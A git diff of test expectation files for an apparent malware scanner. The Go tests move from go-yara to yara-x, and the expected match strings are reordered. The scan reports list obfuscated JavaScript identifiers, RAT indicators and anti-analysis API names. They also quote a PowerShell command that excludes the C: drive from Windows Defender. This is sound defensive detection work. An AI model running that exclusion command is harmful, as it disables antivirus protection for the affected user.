"0x55909c", "0x5597dc", - "0x55a", "0x55b2cc", "0x55cd6f", "0x55d5f0", "0x55e3bb", - "0x55f", "0x560e2a", "0x560e9f", - "0x561", "0x5622f0", - "0x563", "0x565bab", "0x5669a6", "0x566fc2", - "0x567", "0x568442", "0x568dad", "0x5699ce", "0x56a2d6", "0x56ba53", "0x56c4dc", - "0x56d", "0x56e44a", "0x570d83", "0x571a62", @@ -1381,52 +923,36 @@ "0x57235a", "0x574b86", "0x575056", - "0x577", "0x578a21", "0x578c83", - "0x579", - "0x57a", "0x57c225", - "0x57d", "0x57e032", "0x57f1dd", - "0x580", "0x581651", - "0x582", "0x584081", "0x58460e", "0x584672", "0x584b77", - "0x584be", "0x5852bf", "0x58565e", - "0x586", "0x5876cf", - "0x588", "0x589883", "0x58ad35", "0x58ad65", - "0x58b", - "0x58c", - "0x58d", "0x58e78c", "0x58fcd4", "0x58fd71", "0x590279", - "0x5907a", "0x590ce9", - "0x591", "0x5928ea", "0x592edc", "0x593ac8", "0x5940b1", "0x594da5", - "0x596", "0x597144", "0x59721f", "0x598aca", "0x599ffb", - "0x59a", "0x59bbc4", "0x59ccd9", "0x59d537", @@ -1435,29 +961,23 @@ "0x59f2d5", "0x59fd11", "0x5a0c00", - "0x5a1", "0x5a2d63", "0x5a3633", "0x5a380b", "0x5a473e", - "0x5a6", - "0x5a7", "0x5a89bb", "0x5a9366", "0x5a9873", "0x5a98ac", "0x5a9b46", - "0x5aa", "0x5abf1a", "0x5ac95e", "0x5ad9f6", "0x5aee7e", - "0x5af", "0x5b027a", "0x5b1ff1", "0x5b2713", "0x5b36a4", - "0x5b4", "0x5b50de", "0x5b66e8", "0x5b95c0", @@ -1465,32 +985,20 @@ "0x5ba649", "0x5bba5a", "0x5bbc42", - "0x5bc", - "0x5bd", - "0x5be", "0x5bf6bd", "0x5c1ea1", - "0x5c2", "0x5c364d", "0x5c3b99", - "0x5c4", "0x5c59eb", "0x5c6377", "0x5c72c9", "0x5c77c7", "0x5c872e", - "0x5ca", - "0x5cb", - "0x5cc", - "0x5ce", - "0x5cf", "0x5d127b", "0x5d13b9", "0x5d22ad", "0x5d2b74", "0x5d42f0", - "0x5d5", - "0x5d6", "0x5d7ac1", "0x5d8914", "0x5d93e0", @@ -1500,7 +1008,6 @@ "0x5dafee", "0x5db2e6", "0x5dbd69", - "0x5dc", "0x5df90a", "0x5e0a45", "0x5e2a14", @@ -1511,48 +1018,665 @@ "0x5e813b", "0x5e883d", "0x5e9944", - "0x5ea", - "0x5ec", "0x5ed505", "0x5f0952", "0x5f1069", "0x5f2451", "0x5f3766", - "0x5f4", "0x5f5678", "0x5f57a3", - "0x5f8", - "0x5f9", - "0x5fa", - "0x5fb", - "0x5fc", - "0x5fe", - "0x5ff", "0x6015a1", "0x6024b2", - "0x603", - "0x605", - "0x608", - "0x60a", - "0x60c", - "0x60d", "0x60f947", "0x610035", - "0x611", - "0x612", "0x61471f", - "0x617", + "0x622810", + "0x629988", + "0x650696", + "0x65f042", + "0x662cb0", + "0x663564", + "0x66c007", + "0x6718d4", + "0x6ac80f", + "0x6add17", + "0x6ca819", + "0x6cfed7", + "0x6f7bfe", + "0x6fab3f", + "0x6fce51", + "0x7027a9", + "0x739367", + "0x739e9f", + "0x782d81", + "0x7a5391", + "0x7ac78f", + "0x7af5e0", + "0x7c9353", + "0x7d7234", + "0x7f8e06", + "0x814db3", + "0x81eaab", + "0x829c03", + "0x82e9e9", + "0x8399bd", + "0x86f5bc", + "0x87972a", + "0x87b990", + "0x87c22f", + "0x88439c", + "0x897f95", + "0x8cac23", + "0x8ef5fd", + "0x907f0e", + "0x90f78b", + "0x922790", + "0x9402db", + "0x94f9ae", + "0x96f05e", + "0x9b02e5", + "0x9ba297", + "0x9c3982", + "0x9d14fa", + "0x9e7fc6", + "0xa1ba9f", + "0xa334ab", + "0xa37a58", + "0xa8c958", + "0xa9286c", + "0xa9d66a", + "0xae960f", + "0xb3496a", + "0xb3ad4b", + "0xb5eb5e", + "0xb75899", + "0xb7acf7", + "0xbfba48", + "0xbfe5b0", + "0xc0eac3", + "0xc1177b", + "0xc1ef45", + "0xc5ec38", + "0xc603bc", + "0xc65303", + "0xc954d6", + "0xc95a63", + "0xcb4209", + "0xcd317e", + "0xcd55dd", + "0xced8c3", + "0xcfbb79", + "0xd1593c", + "0xd1c12a", + "0xd50833", + "0xd51ea9", + "0xd7b363", + "0xd816fc", + "0xd827c6", + "0xd93969", + "0xd9a5cc", + "0xdf1c68", + "0xdf7eb8", + "0xdfc7e4", + "0xe04673", + "0xe10c3e", + "0xe15ec1", + "0xe1683c", + "0xe1bfab", + "0xe35f46", + "0xe44e1c", + "0xe57ab2", + "0xe798b0", + "0xe8376f", + "0xe9815e", + "0xecee27", + "0xeebe5e", + "0xef853f", + "0xf0b162", + "0xf1f154", + "0xf6538f", + "0xf6b3ac", + "0xf6c555", + "0xf91651", + "0xf9ae03", + "0xfaea11", + "0xfc5532", + "0xfe8daa", + "0xfed356", + "0xfed3e6", + "0xfff445", + "0x3a3d4", + "0x4752a", + "0x53914", + "0x584be", + "0x5907a", + "0x8849a", + "0x88fec", + "0xa137f", + "0xc1bed", + "0xc65b7", + "0xd25f7", + "0xec46f", + "0xf34ee", + "0xf459a", + "0xfcc52", + "0x1028", + "0x1059", + "0x1092", + "0x117f", + "0x11d3", + "0x1336", + "0x134f", + "0x13e0", + "0x146f", + "0x1575", + "0x1587", + "0x15d1", + "0x161c", + "0x16f9", + "0x1b36", + "0x1b4c", + "0x1ca5", + "0x1caa", + "0x220d", + "0x2286", + "0x2380", + "0x2409", + "0x2538", + "0x260e", + "0x26f2", + "0x2a77", + "0x2c43", + "0x2e0e", + "0x2ef0", + "0x30cf", + "0x38f0", + "0xd818", + "0x103", + "0x106", + "0x108", + "0x10c", + "0x10d", + "0x10f", + "0x114", + "0x118", + "0x119", + "0x11c", + "0x120", + "0x123", + "0x125", + "0x128", + "0x12d", + "0x12f", + "0x131", + "0x135", + "0x136", + "0x137", + "0x139", + "0x13b", + "0x13f", + "0x140", + "0x141", + "0x147", + "0x148", + "0x14a", + "0x14b", + "0x14d", + "0x14e", + "0x150", + "0x151", + "0x153", + "0x154", + "0x155", + "0x159", + "0x15b", + "0x15f", + "0x162", + "0x164", + "0x167", + "0x168", + "0x169", + "0x16a", + "0x16b", + "0x172", + "0x174", + "0x177", + "0x17c", + "0x17d", + "0x17e", + "0x17f", + "0x181", + "0x182", + "0x183", + "0x185", + "0x18b", + "0x18c", + "0x18e", + "0x18f", + "0x193", + "0x195", + "0x196", + "0x199", + "0x19b", + "0x19c", + "0x19e", + "0x1a2", + "0x1a5", + "0x1a8", + "0x1ab", + "0x1ad", + "0x1ae", + "0x1b0", + "0x1bc", + "0x1bd", + "0x1be", + "0x1c0", + "0x1c1", + "0x1c3", + "0x1c4", + "0x1c6", + "0x1c7", + "0x1c9", + "0x1cf", + "0x1d0", + "0x1d1", + "0x1d2", + "0x1d5", + "0x1d8", + "0x1dd", + "0x1de", + "0x1df", + "0x1e0", + "0x1e5", + "0x1e8", + "0x1ea", + "0x1ed", + "0x1ef", + "0x1f3", + "0x1f5", + "0x1f6", + "0x1f8", + "0x1fa", + "0x1fb", + "0x1fc", + "0x1fe", + "0x200", + "0x208", + "0x209", + "0x20d", + "0x20f", + "0x211", + "0x212", + "0x213", + "0x215", + "0x217", + "0x218", + "0x21a", + "0x21b", + "0x21c", + "0x221", + "0x224", + "0x226", + "0x227", + "0x232", + "0x23e", + "0x241", + "0x242", + "0x243", + "0x245", + "0x246", + "0x247", + "0x24d", + "0x24e", + "0x250", + "0x251", + "0x257", + "0x25a", + "0x261", + "0x264", + "0x267", + "0x268", + "0x26a", + "0x26e", + "0x270", + "0x273", + "0x278", + "0x27b", + "0x27c", + "0x281", + "0x282", + "0x283", + "0x286", + "0x289", + "0x28a", + "0x28b", + "0x28e", + "0x293", + "0x294", + "0x297", + "0x298", + "0x29b", + "0x29f", + "0x2a1", + "0x2a4", + "0x2ab", + "0x2ad", + "0x2ae", + "0x2b0", + "0x2b4", + "0x2b8", + "0x2b9", + "0x2ba", + "0x2bd", + "0x2be", + "0x2c1", + "0x2c2", + "0x2c5", + "0x2c9", + "0x2cb", + "0x2cc", + "0x2cf", + "0x2d4", + "0x2da", + "0x2dd", + "0x2de", + "0x2df", + "0x2e4", + "0x2e8", + "0x2e9", + "0x2ec", + "0x2ed", + "0x2f0", + "0x2f2", + "0x300", + "0x302", + "0x303", + "0x306", + "0x308", + "0x309", + "0x30b", + "0x30e", + "0x310", + "0x311", + "0x312", + "0x315", + "0x318", + "0x319", + "0x31a", + "0x31b", + "0x31c", + "0x31d", + "0x320", + "0x322", + "0x324", + "0x325", + "0x327", + "0x329", + "0x331", + "0x335", + "0x336", + "0x33c", + "0x33f", + "0x343", + "0x344", + "0x353", + "0x354", + "0x356", + "0x358", + "0x359", + "0x35a", + "0x35d", + "0x360", + "0x361", + "0x363", + "0x365", + "0x367", + "0x368", + "0x36a", + "0x36b", + "0x36c", + "0x36d", + "0x36e", + "0x370", + "0x376", + "0x37f", + "0x382", + "0x383", + "0x384", + "0x387", + "0x38c", + "0x38e", + "0x390", + "0x391", + "0x393", + "0x397", + "0x398", + "0x39b", + "0x39c", + "0x39d", + "0x39e", + "0x39f", + "0x3a0", + "0x3a1", + "0x3a2", + "0x3a5", + "0x3a8", + "0x3aa", + "0x3ac", + "0x3b0", + "0x3b4", + "0x3b6", + "0x3b7", + "0x3b9", + "0x3bc", + "0x3c2", + "0x3c5", + "0x3cd", + "0x3ce", + "0x3d0", + "0x3d3", + "0x3d6", + "0x3d7", + "0x3d9", + "0x3dc", + "0x3e1", + "0x3e3", + "0x3e5", + "0x3e6", + "0x3ec", + "0x3ee", + "0x3f1", + "0x3f2", + "0x3f3", + "0x3f5", + "0x3fd", + "0x403", + "0x406", + "0x407", + "0x40a", + "0x40c", + "0x40d", + "0x410", + "0x412", + "0x414", + "0x415", + "0x418", + "0x41f", + "0x427", + "0x428", + "0x42a", + "0x42d", + "0x42f", + "0x430", + "0x434", + "0x435", + "0x437", + "0x43a", + "0x43c", + "0x446", + "0x44b", + "0x44e", + "0x456", + "0x458", + "0x45a", + "0x45b", + "0x45f", + "0x460", + "0x462", + "0x466", + "0x467", + "0x46e", + "0x46f", + "0x470", + "0x474", + "0x477", + "0x478", + "0x481", + "0x484", + "0x486", + "0x48b", + "0x48e", + "0x48f", + "0x493", + "0x495", + "0x498", + "0x499", + "0x49b", + "0x49c", + "0x49e", + "0x49f", + "0x4a1", + "0x4a4", + "0x4a5", + "0x4a6", + "0x4a7", + "0x4a8", + "0x4ae", + "0x4b1", + "0x4b2", + "0x4b3", + "0x4b4", + "0x4b5", + "0x4b8", + "0x4ba", + "0x4bd", + "0x4c2", + "0x4c3", + "0x4c5", + "0x4c6", + "0x4c7", + "0x4c8", + "0x4cc", + "0x4d4", + "0x4d6", + "0x4d7", + "0x4de", + "0x4e0", + "0x4e4", + "0x4e6", + "0x4e7", + "0x4e9", + "0x4ea", + "0x4eb", + "0x4ec", + "0x4ef", + "0x4f0", + "0x4f6", + "0x4f9", + "0x4fc", + "0x4ff", + "0x506", + "0x507", + "0x50c", + "0x510", + "0x511", + "0x51c", + "0x51d", + "0x51f", + "0x520", + "0x523", + "0x524", + "0x528", + "0x52d", + "0x530", + "0x534", + "0x536", + "0x53e", + "0x542", + "0x545", + "0x54c", + "0x54e", + "0x552", + "0x554", + "0x557", + "0x558", + "0x55a", + "0x55f", + "0x561", + "0x563", + "0x567", + "0x56d", + "0x577", + "0x579", + "0x57a", + "0x57d", + "0x580", + "0x582", + "0x586", + "0x588", + "0x58b", + "0x58c", + "0x58d", + "0x591", + "0x596", + "0x59a", + "0x5a1", + "0x5a6", + "0x5a7", + "0x5aa", + "0x5af", + "0x5b4", + "0x5bc", + "0x5bd", + "0x5be", + "0x5c2", + "0x5c4", + "0x5ca", + "0x5cb", + "0x5cc", + "0x5ce", + "0x5cf", + "0x5d5", + "0x5d6", + "0x5dc", + "0x5ea", + "0x5ec", + "0x5f4", + "0x5f8", + "0x5f9", + "0x5fa", + "0x5fb", + "0x5fc", + "0x5fe", + "0x5ff", + "0x603", + "0x605", + "0x608", + "0x60a", + "0x60c", + "0x60d", + "0x611", + "0x612", + "0x617", "0x618", "0x619", "0x61a", "0x61c", "0x620", "0x621", - "0x622810", "0x623", "0x624", "0x625", - "0x629988", "0x62c", "0x62e", "0x630", @@ -1570,20 +1694,14 @@ "0x649", "0x64e", "0x64f", - "0x650696", "0x651", "0x652", "0x654", - "0x655", - "0x657", - "0x65b", - "0x65f042", - "0x662cb0", - "0x663564", - "0x66c007", + "0x655", + "0x657", + "0x65b", "0x66d", "0x670", - "0x6718d4", "0x673", "0x675", "0x677", @@ -1592,114 +1710,65 @@ "0x682", "0x683", "0x689", - "0x69", "0x6a7", - "0x6ac80f", - "0x6add17", "0x6b0", "0x6b9", - "0x6ca819", "0x6cd", - "0x6cfed7", "0x6d8", "0x6d9", "0x6dd", "0x6e2", "0x6f0", - "0x6f7bfe", - "0x6fab3f", - "0x6fce51", - "0x7027a9", "0x70f", + "0x735", + "0x809", + "0x85d", + "0xc01", + "0xcc7", + "0xd87", + "0xe8c", + "0xf39", + "\\x20D", + "\\x20b", + "0x69", "0x71", "0x72", - "0x735", - "0x739367", - "0x739e9f", "0x74", "0x75", "0x76", "0x77", - "0x782d81", "0x79", - "0x7a5391", - "0x7ac78f", - "0x7af5e0", "0x7b", - "0x7c9353", - "0x7d7234", "0x7e", - "0x7f8e06", - "0x809", - "0x814db3", - "0x81eaab", - "0x829c03", - "0x82e9e9", - "0x8399bd", "0x84", - "0x85d", - "0x86f5bc", - "0x87972a", - "0x87b990", - "0x87c22f", - "0x88439c", - "0x8849a", - "0x88fec", - "0x897f95", "0x8a", "0x8b", - "0x8cac23", "0x8d", - "0x8ef5fd", "0x8f", - "0x907f0e", - "0x90f78b", "0x91", - "0x922790", "0x93", - "0x9402db", - "0x94f9ae", "0x95", - "0x96f05e", "0x97", "0x98", "0x99", "0x9a", - "0x9b02e5", - "0x9ba297", - "0x9c3982", - "0x9d14fa", - "0x9e7fc6", "0x9f", "0xa0", - "0xa137f", - "0xa1ba9f", "0xa2", - "0xa334ab", - "0xa37a58", "0xa4", "0xa5", "0xa6", "0xa7", - "0xa8c958", - "0xa9286c", - "0xa9d66a", "0xaa", "0xab", "0xac", "0xad", - "0xae960f", "0xaf", "0xb0", "0xb1", "0xb2", - "0xb3496a", - "0xb3ad4b", "0xb4", - "0xb5eb5e", "0xb6", - "0xb75899", - "0xb7acf7", "0xb8", "0xb9", "0xba", @@ -1707,98 +1776,29 @@ "0xbc", "0xbd", "0xbe", - "0xbfba48", - "0xbfe5b0", - "0xc01", - "0xc0eac3", - "0xc1177b", - "0xc1bed", - "0xc1ef45", "0xc2", "0xc3", "0xc4", - "0xc5ec38", - "0xc603bc", - "0xc65303", - "0xc65b7", "0xc7", "0xc8", - "0xc954d6", - "0xc95a63", "0xca", - "0xcb4209", - "0xcc7", - "0xcd317e", - "0xcd55dd", - "0xced8c3", - "0xcfbb79", "0xd0", - "0xd1593c", - "0xd1c12a", - "0xd25f7", "0xd3", "0xd4", - "0xd50833", - "0xd51ea9", "0xd6", - "0xd7b363", - "0xd816fc", - "0xd818", - "0xd827c6", - "0xd87", - "0xd93969", - "0xd9a5cc", "0xda", "0xdb", "0xdc", "0xdd", "0xde", - "0xdf1c68", - "0xdf7eb8", - "0xdfc7e4", - "0xe04673", - "0xe10c3e", - "0xe15ec1", - "0xe1683c", - "0xe1bfab", "0xe2", - "0xe35f46", - "0xe44e1c", - "0xe57ab2", - "0xe798b0", - "0xe8376f", - "0xe8c", - "0xe9815e", "0xea", "0xeb", - "0xec46f", - "0xecee27", "0xed", - "0xeebe5e", - "0xef853f", - "0xf0b162", - "0xf1f154", "0xf2", - "0xf34ee", - "0xf39", - "0xf459a", "0xf5", - "0xf6538f", - "0xf6b3ac", - "0xf6c555", "0xf7", "0xf8", - "0xf91651", - "0xf9ae03", - "0xfaea11", - "0xfc5532", - "0xfcc52", - "0xfe8daa", - "0xfed356", - "0xfed3e6", - "0xfff445", - "\\x20D", - "\\x20b", "\\x22", "\\x5c" ], @@ -1811,62 +1811,6 @@ { "Description": "javascript function obfuscation (hex)", "MatchStrings": [ - "const _0x104ea0=", - "const _0x1669ef=", - "const _0x16d3c3=", - "const _0x173075=_0x1f2eb3", - "const _0x1788d6=_0x405653", - "const _0x194c9c=_0x4d800c", - "const _0x1b29ee=_0x7c9353", - "const _0x1d7c1b=_0x3ab5d4", - "const _0x1f2eb3=", - "const _0x203b6e=", - "const _0x2790f0=_0x5a3633", - "const _0x27da5b=_0x32b483", - "const _0x2b3102=_0x3c6cbe", - "const _0x2e60ae=await", - "const _0x2ee8f4=", - "const _0x30d8af=_0x2f18df", - "const _0x34bb3c=", - "const _0x39a03e=parseInt", - "const _0x3be3ce=", - "const _0x3c6cbe=", - "const _0x3e85fd=new", - "const _0x3f8597=_0x26c110", - "const _0x405653=", - "const _0x41bf8f=_0x53bc75", - "const _0x42e627=_0x584672", - "const _0x447ce7=", - "const _0x454078=_0x355cfa", - "const _0x4797c3=await", - "const _0x487164=_0x2eaf2e", - "const _0x489c5b=", - "const _0x4aa6e8=", - "const _0x4c43d2=_0x5aee7e", - "const _0x4d800c=", - "const _0x4dac6e=_0xa137f", - "const _0x505a52=new", - "const _0x50a1bf=", - "const _0x522270=_0xf34ee", - "const _0x5622f0=_0x3edc70", - "const _0x5669a6=", - "const _0x57235a=_0xe1683c", - "const _0x574b86=new", - "const _0x581651=_0x442f25", - "const _0x584672=", - "const _0x592edc=_0x4a3255", - "const _0x6cfed7=", - "const _0x6f7bfe=new", - "const _0x782d81=", - "const _0x7c9353=", - "const _0x8849a=_0x531a64", - "const _0x8cac23=", - "const _0x9e7fc6=_0xef853f", - "const _0xa37a58=", - "const _0xa8c958=_0x4137f8", - "const _0xb3496a=_0x49a96a", - "const _0xdfc7e4=_0x2b151c", - "const _0xf6c555=_0x447ce7", "return _0x112f86(_0x88439c", "return _0x1157bd(_0x38b6a2", "return _0x138021(_0x4205f0", @@ -1940,7 +1884,6 @@ "return _0x59bbc4(_0x263b94", "return _0x5d13b9(_0x598aca", "return _0x5e4955(_0x45104a", - "return _0x5e4955(_0xf459a", "return _0x5f1069(_0x3557d9", "return _0x629988(_0x1b828c", "return _0x66c007(_0x11ee82", @@ -1950,7 +1893,64 @@ "return _0x9402db(_0x4ca44f", "return _0x9402db(_0xbfe5b0", "return _0xfed3e6(_0x420aaf", - "return _0xfed3e6(_0x56a2d6" + "return _0xfed3e6(_0x56a2d6", + "const _0x173075=_0x1f2eb3", + "const _0x1788d6=_0x405653", + "const _0x194c9c=_0x4d800c", + "const _0x1b29ee=_0x7c9353", + "const _0x1d7c1b=_0x3ab5d4", + "const _0x2790f0=_0x5a3633", + "const _0x27da5b=_0x32b483", + "const _0x2b3102=_0x3c6cbe", + "const _0x30d8af=_0x2f18df", + "const _0x3f8597=_0x26c110", + "const _0x41bf8f=_0x53bc75", + "const _0x42e627=_0x584672", + "const _0x454078=_0x355cfa", + "const _0x487164=_0x2eaf2e", + "const _0x4c43d2=_0x5aee7e", + "const _0x5622f0=_0x3edc70", + "const _0x57235a=_0xe1683c", + "const _0x581651=_0x442f25", + "const _0x592edc=_0x4a3255", + "const _0x9e7fc6=_0xef853f", + "const _0xa8c958=_0x4137f8", + "const _0xb3496a=_0x49a96a", + "const _0xdfc7e4=_0x2b151c", + "const _0xf6c555=_0x447ce7", + "return _0x5e4955(_0xf459a", + "const _0x39a03e=parseInt", + "const _0x4dac6e=_0xa137f", + "const _0x522270=_0xf34ee", + "const _0x8849a=_0x531a64", + "const _0x2e60ae=await", + "const _0x4797c3=await", + "const _0x3e85fd=new", + "const _0x505a52=new", + "const _0x574b86=new", + "const _0x6f7bfe=new", + "const _0x104ea0=", + "const _0x1669ef=", + "const _0x16d3c3=", + "const _0x1f2eb3=", + "const _0x203b6e=", + "const _0x2ee8f4=", + "const _0x34bb3c=", + "const _0x3be3ce=", + "const _0x3c6cbe=", + "const _0x405653=", + "const _0x447ce7=", + "const _0x489c5b=", + "const _0x4aa6e8=", + "const _0x4d800c=", + "const _0x50a1bf=", + "const _0x5669a6=", + "const _0x584672=", + "const _0x6cfed7=", + "const _0x782d81=", + "const _0x7c9353=", + "const _0x8cac23=", + "const _0xa37a58=" ], "RiskScore": 4, "RiskLevel": "CRITICAL", diff --git a/tests/python/2024.yocolor/setup.py.json b/tests/python/2024.yocolor/setup.py.json index c0d44b9b7..fc4806381 100644 --- a/tests/python/2024.yocolor/setup.py.json +++ b/tests/python/2024.yocolor/setup.py.json @@ -30,10 +30,10 @@ "from distutils.core import setup", "from setuptools import setup", "import fernet", - "import os", - "import re", + "import with", "import sys", - "import with" + "import os", + "import re" ], "RiskScore": 1, "RiskLevel": "LOW", diff --git a/tests/samples_test.go b/tests/samples_test.go index 237537285..74d87647b 100644 --- a/tests/samples_test.go +++ b/tests/samples_test.go @@ -26,7 +26,8 @@ import ( "github.com/chainguard-dev/malcontent/rules" thirdparty "github.com/chainguard-dev/malcontent/third_party" "github.com/google/go-cmp/cmp" - "github.com/hillu/go-yara/v4" + + yarax "github.com/VirusTotal/yara-x/go" ) var ( @@ -34,7 +35,7 @@ var ( rfs = []fs.FS{rules.FS, thirdparty.FS} sampleDir = "" testDataDir = "" - yrs *yara.Rules + yrs *yarax.Rules ) func init() { diff --git a/tests/windows/2024.Sharp/sharpil_RAT.exe.md b/tests/windows/2024.Sharp/sharpil_RAT.exe.md index ad695bf66..f6c5f1544 100644 --- a/tests/windows/2024.Sharp/sharpil_RAT.exe.md +++ b/tests/windows/2024.Sharp/sharpil_RAT.exe.md @@ -2,7 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| -| CRITICAL | [3P/ditekshen/telegramchatbot](https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1293-L1308) | Detects executables using Telegram Chat Bot, by [ditekSHen](https://github.com/ditekshen/detection) | $p1
$p2
$s1
$s2
$s4 | +| CRITICAL | [3P/ditekshen/telegramchatbot](https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1293-L1308) | Detects executables using Telegram Chat Bot, by [ditekSHen](https://github.com/ditekshen/detection) | | | HIGH | [net/email/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/email/send.yara#SMTPClient_Send_creds) | sends e-mail with a hardcoded credentials | [NetworkCredential](https://github.com/search?q=NetworkCredential&type=code) | | MEDIUM | [c2/addr/discord](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/discord.yara#discord) | may report back to 'Discord' | [Discord](https://github.com/search?q=Discord&type=code) | | MEDIUM | [c2/addr/telegram](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/telegram.yara#telegram) | telegram | [Telegram](https://github.com/search?q=Telegram&type=code) | diff --git a/tests/windows/2024.aspdasdksa2/Nil.exe.md b/tests/windows/2024.aspdasdksa2/Nil.exe.md index 34e9c21f5..29a700021 100644 --- a/tests/windows/2024.aspdasdksa2/Nil.exe.md +++ b/tests/windows/2024.aspdasdksa2/Nil.exe.md @@ -3,9 +3,9 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| | CRITICAL | [impact/degrade/win_defender](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/degrade/win_defender.yara#win_defender_exclusion) | Uses powershell to define Windows Defender exclusions | [powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"](https://github.com/search?q=powershell+-Command+%22Add-MpPreference+-ExclusionPath+%27C%3A%5C%27%22&type=code) | -| MEDIUM | [anti-behavior/anti_debugger](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/anti-debugger.yara#win_debugger_present) | Detects if process is being executed within a debugger or VM | [IsDebuggerPresent](https://github.com/search?q=IsDebuggerPresent&type=code)
[UnhandledExceptionFilter](https://github.com/search?q=UnhandledExceptionFilter&type=code) | +| MEDIUM | [anti-behavior/anti_debugger](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/anti-debugger.yara#win_debugger_present) | Detects if process is being executed within a debugger or VM | [UnhandledExceptionFilter](https://github.com/search?q=UnhandledExceptionFilter&type=code)
[IsDebuggerPresent](https://github.com/search?q=IsDebuggerPresent&type=code) | | MEDIUM | [data/embedded/app_manifest](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/app-manifest.yara#app_manifest) | [Contains embedded Microsoft Windows application manifest](https://learn.microsoft.com/en-us/cpp/build/reference/manifestuac-embeds-uac-information-in-manifest?view=msvc-170) | [requestedExecutionLevel](https://github.com/search?q=requestedExecutionLevel&type=code)
[requestedPrivileges](https://github.com/search?q=requestedPrivileges&type=code) | | MEDIUM | [exec/shell/power](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell) | runs powershell scripts | [powershell -Command](https://github.com/search?q=powershell+-Command&type=code) | -| MEDIUM | [impact/degrade/edr](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/degrade/edr.yara#win_kill_proc) | may be able to bypass or kill EDR software | [GetCurrentProcess](https://github.com/search?q=GetCurrentProcess&type=code)
[GetCurrentThread](https://github.com/search?q=GetCurrentThread&type=code)
[GetModuleHandle](https://github.com/search?q=GetModuleHandle&type=code)
[GetSystemTimeAsFileTime](https://github.com/search?q=GetSystemTimeAsFileTime&type=code)
[IsDebuggerPresent](https://github.com/search?q=IsDebuggerPresent&type=code)
[IsProcessorFeaturePresent](https://github.com/search?q=IsProcessorFeaturePresent&type=code)
[QueryPerformanceCounter](https://github.com/search?q=QueryPerformanceCounter&type=code)
[TerminateProcess](https://github.com/search?q=TerminateProcess&type=code)
[UnhandledExceptionFilter](https://github.com/search?q=UnhandledExceptionFilter&type=code) | +| MEDIUM | [impact/degrade/edr](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/degrade/edr.yara#win_kill_proc) | may be able to bypass or kill EDR software | [IsProcessorFeaturePresent](https://github.com/search?q=IsProcessorFeaturePresent&type=code)
[UnhandledExceptionFilter](https://github.com/search?q=UnhandledExceptionFilter&type=code)
[GetSystemTimeAsFileTime](https://github.com/search?q=GetSystemTimeAsFileTime&type=code)
[QueryPerformanceCounter](https://github.com/search?q=QueryPerformanceCounter&type=code)
[GetCurrentProcess](https://github.com/search?q=GetCurrentProcess&type=code)
[IsDebuggerPresent](https://github.com/search?q=IsDebuggerPresent&type=code)
[GetCurrentThread](https://github.com/search?q=GetCurrentThread&type=code)
[TerminateProcess](https://github.com/search?q=TerminateProcess&type=code)
[GetModuleHandle](https://github.com/search?q=GetModuleHandle&type=code) | | MEDIUM | [process/terminate](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/terminate/terminate.yara#TerminateProcess) | terminate a process | [TerminateProcess](https://github.com/search?q=TerminateProcess&type=code) | diff --git a/tests/windows/2024.aspdasdksa2/callback.bat.json b/tests/windows/2024.aspdasdksa2/callback.bat.json index 79aa78a6c..7071c2679 100644 --- a/tests/windows/2024.aspdasdksa2/callback.bat.json +++ b/tests/windows/2024.aspdasdksa2/callback.bat.json @@ -46,8 +46,8 @@ { "Description": "references a specific operating system", "MatchStrings": [ - "Windows", - "https://" + "https://", + "Windows" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -104,8 +104,8 @@ "Description": "mentions 'malware'", "MatchStrings": [ "I \"IMAGENAME eq Malwarebytes", - "N \"Malwarebytes", - "malwarebytes_assistant" + "malwarebytes_assistant", + "N \"Malwarebytes" ], "RiskScore": 2, "RiskLevel": "MEDIUM",